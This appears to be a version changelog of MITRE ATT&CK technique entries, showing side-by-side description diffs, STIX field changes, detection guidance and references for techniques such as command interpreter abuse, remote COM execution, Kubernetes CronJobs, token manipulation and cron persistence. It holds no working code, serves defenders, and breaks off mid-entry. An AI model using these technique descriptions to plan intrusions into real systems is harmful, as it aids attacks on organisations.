x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
x_mitre_version1.01.1

[T1059] Command and Scripting Interpreter

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may abuse command and script interpreters to exet1Adversaries may abuse command and script interpreters to exe
>cute commands, scripts, or binaries. These interfaces and la>cute commands, scripts, or binaries. These interfaces and la
>nguages provide ways of interacting with computer systems an>nguages provide ways of interacting with computer systems an
>d are a common feature across many different platforms. Most>d are a common feature across many different platforms. Most
> systems come with some built-in command-line interface and > systems come with some built-in command-line interface and 
>scripting capabilities, for example, macOS and Linux distrib>scripting capabilities, for example, macOS and Linux distrib
>utions include some flavor of [Unix Shell](https://attack.mi>utions include some flavor of [Unix Shell](https://attack.mi
>tre.org/techniques/T1059/004) while Windows installations in>tre.org/techniques/T1059/004) while Windows installations in
>clude the [Windows Command Shell](https://attack.mitre.org/t>clude the [Windows Command Shell](https://attack.mitre.org/t
>echniques/T1059/003) and [PowerShell](https://attack.mitre.o>echniques/T1059/003) and [PowerShell](https://attack.mitre.o
>rg/techniques/T1059/001).  There are also cross-platform int>rg/techniques/T1059/001).  There are also cross-platform int
>erpreters such as [Python](https://attack.mitre.org/techniqu>erpreters such as [Python](https://attack.mitre.org/techniqu
>es/T1059/006), as well as those commonly associated with cli>es/T1059/006), as well as those commonly associated with cli
>ent applications such as [JavaScript](https://attack.mitre.o>ent applications such as [JavaScript](https://attack.mitre.o
>rg/techniques/T1059/007) and [Visual Basic](https://attack.m>rg/techniques/T1059/007) and [Visual Basic](https://attack.m
>itre.org/techniques/T1059/005).  Adversaries may abuse these>itre.org/techniques/T1059/005).  Adversaries may abuse these
> technologies in various ways as a means of executing arbitr> technologies in various ways as a means of executing arbitr
>ary commands. Commands and scripts can be embedded in [Initi>ary commands. Commands and scripts can be embedded in [Initi
>al Access](https://attack.mitre.org/tactics/TA0001) payloads>al Access](https://attack.mitre.org/tactics/TA0001) payloads
> delivered to victims as lure documents or as secondary payl> delivered to victims as lure documents or as secondary payl
>oads downloaded from an existing C2. Adversaries may also ex>oads downloaded from an existing C2. Adversaries may also ex
>ecute commands through interactive terminals/shells.>ecute commands through interactive terminals/shells, as well
 > as utilize various [Remote Services](https://attack.mitre.o
 >rg/techniques/T1021) in order to achieve remote Execution.(C
 >itation: Powershell Remote Commands)(Citation: Cisco IOS Sof
 >tware Integrity Assurance - Command History)(Citation: Remot
 >e Shell Execution in Python)

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:21:06.164000+00:002021-08-16 21:03:21.700000+00:00
descriptionAdversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)
x_mitre_remote_supportFalseTrue
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Powershell Remote Commands', 'description': 'Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.', 'url': 'https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1'}
external_references{'source_name': 'Cisco IOS Software Integrity Assurance - Command History', 'description': 'Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.', 'url': 'https://tools.cisco.com/security/center/resources/integrity_assurance.html#23'}
external_references{'source_name': 'Remote Shell Execution in Python', 'description': 'Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.', 'url': 'https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python'}

[T1559.001] Inter-Process Communication: Component Object Model

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use the Windows Component Object Model (COM)t1Adversaries may use the Windows Component Object Model (COM)
> for local code execution. COM is an inter-process communica> for local code execution. COM is an inter-process communica
>tion (IPC) component of the native Windows application progr>tion (IPC) component of the native Windows application progr
>amming interface (API) that enables interaction between soft>amming interface (API) that enables interaction between soft
>ware objects, or executable code that implements one or more>ware objects, or executable code that implements one or more
> interfaces.(Citation: Fireeye Hunting COM June 2019) Throug> interfaces.(Citation: Fireeye Hunting COM June 2019) Throug
>h COM, a client object can call methods of server objects, w>h COM, a client object can call methods of server objects, w
>hich are typically binary Dynamic Link Libraries (DLL) or ex>hich are typically binary Dynamic Link Libraries (DLL) or ex
>ecutables (EXE).(Citation: Microsoft COM)  Various COM inter>ecutables (EXE).(Citation: Microsoft COM) Remote COM executi
>faces are exposed that can be abused to invoke arbitrary exe>on is facilitated by [Remote Services](https://attack.mitre.
>cution via a variety of programming languages such as C, C++>org/techniques/T1021) such as  [Distributed Component Object
>, Java, and [Visual Basic](https://attack.mitre.org/techniqu> Model](https://attack.mitre.org/techniques/T1021/003) (DCOM
>es/T1059/005).(Citation: Microsoft COM) Specific COM objects>).(Citation: Fireeye Hunting COM June 2019)  Various COM int
> also exist to directly perform functions beyond code execut>erfaces are exposed that can be abused to invoke arbitrary e
>ion, such as creating a [Scheduled Task/Job](https://attack.>xecution via a variety of programming languages such as C, C
>mitre.org/techniques/T1053), fileless download/execution, an>++, Java, and [Visual Basic](https://attack.mitre.org/techni
>d other adversary behaviors related to privilege escalation >ques/T1059/005).(Citation: Microsoft COM) Specific COM objec
>and persistence.(Citation: Fireeye Hunting COM June 2019)(Ci>ts also exist to directly perform functions beyond code exec
>tation: ProjectZero File Write EoP Apr 2018)>ution, such as creating a [Scheduled Task/Job](https://attac
 >k.mitre.org/techniques/T1053), fileless download/execution, 
 >and other adversary behaviors related to privilege escalatio
 >n and persistence.(Citation: Fireeye Hunting COM June 2019)(
 >Citation: ProjectZero File Write EoP Apr 2018)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 19:30:52.639000+00:002021-07-26 22:51:20.448000+00:00
descriptionAdversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
x_mitre_version1.01.1

[T1586] Compromise Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Persona: Social Media', 'Network Traffic: Network Traffic Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:59:07.046000+00:002021-10-16 17:15:12.428000+00:00
x_mitre_version1.01.1

[T1584] Compromise Infrastructure

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content', 'Domain Name: Active DNS', 'Domain Name: Passive DNS', 'Domain Name: Domain Registration']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:04:40.423000+00:002021-10-17 16:01:48.871000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1053.007] Scheduled Task/Job: Container Orchestration Job

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse task scheduling functionality providedt1Adversaries may abuse task scheduling functionality provided
> by container orchestration tools such as Kubernetes to sche> by container orchestration tools such as Kubernetes to sche
>dule deployment of containers configured to execute maliciou>dule deployment of containers configured to execute maliciou
>s code. Container orchestration jobs run these automated tas>s code. Container orchestration jobs run these automated tas
>ks at a specific date and time, similar to cron jobs on a Li>ks at a specific date and time, similar to cron jobs on a Li
>nux system. Deployments of this type can also be configured >nux system. Deployments of this type can also be configured 
>to maintain a quantity of containers over time, automating t>to maintain a quantity of containers over time, automating t
>he process of maintaining persistence within a cluster.  In >he process of maintaining persistence within a cluster.  In 
>Kubernetes, a CronJob may be used to schedule a Job that run>Kubernetes, a CronJob may be used to schedule a Job that run
>s one or more containers to perform specific tasks.(Citation>s one or more containers to perform specific tasks.(Citation
>: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversar>: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversar
>y therefore may utilize a CronJob to schedule deployment of >y therefore may utilize a CronJob to schedule deployment of 
>a Job that executes malicious code in the cluster.(Citation:>a Job that executes malicious code in various nodes within a
> Threat Matrix for Kubernetes)> cluster.(Citation: Threat Matrix for Kubernetes)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:09:46.821000+00:002021-07-27 17:38:17.146000+00:00
descriptionAdversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes)Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
x_mitre_version1.01.1

[T1134.002] Access Token Manipulation: Create Process with Token

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may create a new process with a duplicated tokent1Adversaries may create a new process with a different token 
> to escalate privileges and bypass access controls. An adver>to escalate privileges and bypass access controls. Processes
>sary can duplicate a desired access token with <code>Duplica> can be created with the token and resulting security contex
>teToken(Ex)</code> and use it with <code>CreateProcessWithTo>t of another user using features such as <code>CreateProcess
>kenW</code> to create a new process running under the securi>WithTokenW</code> and <code>runas</code>.(Citation: Microsof
>ty context of the impersonated user. This is useful for crea>t RunAs)  Creating processes with a different token may requ
>ting a new process under the security context of a different>ire the credentials of the target user, specific privileges 
> user.>to impersonate that user, or access to the token to be used 
 >(ex: gathered via other means such as [Token Impersonation/T
 >heft](https://attack.mitre.org/techniques/T1134/001) or [Mak
 >e and Impersonate Token](https://attack.mitre.org/techniques
 >/T1134/003)).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Vadim Khrykov']
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 21:28:19.476000+00:002021-10-17 14:51:48.978000+00:00
descriptionAdversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).
external_references[1]['source_name']Microsoft Command-line LoggingMicrosoft RunAs
external_references[1]['description']Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
external_references[1]['url']https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditinghttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
x_mitre_detectionIf an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) If an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior. Analysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Command-line Logging', 'description': 'Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.', 'url': 'https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing'}

[T1053.003] Scheduled Task/Job: Cron

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse the <code>cron</code> utility to perfot1Adversaries may abuse the <code>cron</code> utility to perfo
>rm task scheduling for initial or recurring execution of mal>rm task scheduling for initial or recurring execution of mal
>icious code. The <code>cron</code> utility is a time-based j>icious code.(Citation: 20 macOS Common Tools and Techniques)
>ob scheduler for Unix-like operating systems.  The <code> cr> The <code>cron</code> utility is a time-based job scheduler
>ontab</code> file contains the schedule of cron entries to b> for Unix-like operating systems.  The <code> crontab</code>
>e run and the specified times for execution. Any <code>cront> file contains the schedule of cron entries to be run and th
>ab</code> files are stored in operating system-specific file>e specified times for execution. Any <code>crontab</code> fi
> paths.  An adversary may use <code>cron</code> in Linux or >les are stored in operating system-specific file paths.  An 
>Unix environments to execute programs at system startup or o>adversary may use <code>cron</code> in Linux or Unix environ
>n a scheduled basis for persistence. <code>cron</code> can a>ments to execute programs at system startup or on a schedule
>lso be abused to conduct remote Execution as part of Lateral>d basis for persistence. 
> Movement and or to run a process under the context of a spe 
>cified account. 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 23:30:46.546000+00:002021-08-23 15:29:36.918000+00:00
descriptionAdversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': '20 macOS Common Tools and Techniques', 'description': 'Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.', 'url': 'https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/'}

[T1584.002] Compromise Infrastructure: DNS Server

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Domain Name: Active DNS', 'Domain Name: Passive DNS']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:01:54.609000+00:002021-10-17 15:56:05.112000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1

[T1486] Data Encrypted for Impact

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 16:39:06.594000+00:002021-08-16 21:07:27.119000+00:00
x_mitre_version1.11.2

[T1213] Data from Information Repositories

Current version: 3.2

Version changed from: 3.1 → 3.2


Old Description
New Description
t1Adversaries may leverage information repositories to mine vat1Adversaries may leverage information repositories to mine va
>luable information. Information repositories are tools that >luable information. Information repositories are tools that 
>allow for storage of information, typically to facilitate co>allow for storage of information, typically to facilitate co
>llaboration or information sharing between users, and can st>llaboration or information sharing between users, and can st
>ore a wide variety of data that may aid adversaries in furth>ore a wide variety of data that may aid adversaries in furth
>er objectives, or direct access to the target information.  >er objectives, or direct access to the target information. A
>The following is a brief list of example information that ma>dversaries may also abuse external sharing features to share
>y hold potential value to an adversary and may also be found> sensitive documents with recipients outside of the organiza
> on an information repository:  * Policies, procedures, and >tion.   The following is a brief list of example information
>standards * Physical / logical network diagrams * System arc> that may hold potential value to an adversary and may also 
>hitecture diagrams * Technical system documentation * Testin>be found on an information repository:  * Policies, procedur
>g / development credentials * Work / project schedules * Sou>es, and standards * Physical / logical network diagrams * Sy
>rce code snippets * Links to network shares and other intern>stem architecture diagrams * Technical system documentation 
>al resources  Information stored in a repository may vary ba>* Testing / development credentials * Work / project schedul
>sed on the specific instance or environment. Specific common>es * Source code snippets * Links to network shares and othe
> information repositories include [Sharepoint](https://attac>r internal resources  Information stored in a repository may
>k.mitre.org/techniques/T1213/002), [Confluence](https://atta> vary based on the specific instance or environment. Specifi
>ck.mitre.org/techniques/T1213/001), and enterprise databases>c common information repositories include web-based platform
> such as SQL Server.>s such as [Sharepoint](https://attack.mitre.org/techniques/T
 >1213/002) and [Confluence](https://attack.mitre.org/techniqu
 >es/T1213/001), specific services such as Code Repositories, 
 >IaaS databases, enterprise databases, and other storage infr
 >astructure such as SQL Server.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:16:12.151000+00:002021-10-16 01:35:43.938000+00:00
descriptionAdversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.
external_references[2]['source_name']Atlassian Confluence LoggingSharepoint Sharing Events
external_references[2]['description']Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.
external_references[2]['url']https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.htmlhttps://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
x_mitre_detectionAs information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
x_mitre_version3.13.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Atlassian Confluence Logging', 'description': 'Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.', 'url': 'https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html'}
x_mitre_contributorsNaveen Vijayaraghavan, Nilesh Dherange (Gurucul)
x_mitre_contributorsRegina Elwell
x_mitre_contributorsIsif Ibrahima
x_mitre_platformsIaaS

[T1005] Data from Local System

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-05-26 19:21:25.974000+00:002021-10-15 22:16:42.734000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution

[T1025] Data from Removable Media

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 15:44:46.584000+00:002021-10-15 22:17:35.218000+00:00
x_mitre_version1.11.2

[T1591.001] Gather Victim Org Information: Determine Physical Locations

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather the victim's physical location(s) that1Adversaries may gather the victim's physical location(s) tha
>t can be used during targeting. Information about physical l>t can be used during targeting. Information about physical l
>ocations of a target organization may include a variety of d>ocations of a target organization may include a variety of d
>etails, including where key resources and infrastructure are>etails, including where key resources and infrastructure are
> housed. Physical locations may also indicate what legal jur> housed. Physical locations may also indicate what legal jur
>isdiction and/or authorities the victim operates within.  Ad>isdiction and/or authorities the victim operates within.  Ad
>versaries may gather this information in various ways, such >versaries may gather this information in various ways, such 
>as direct elicitation via [Phishing for Information](https:/>as direct elicitation via [Phishing for Information](https:/
>/attack.mitre.org/techniques/T1598). Physical locations of a>/attack.mitre.org/techniques/T1598). Physical locations of a
> target organization may also be exposed to adversaries via > target organization may also be exposed to adversaries via 
>online or other accessible data sets (ex: [Search Victim-Own>online or other accessible data sets (ex: [Search Victim-Own
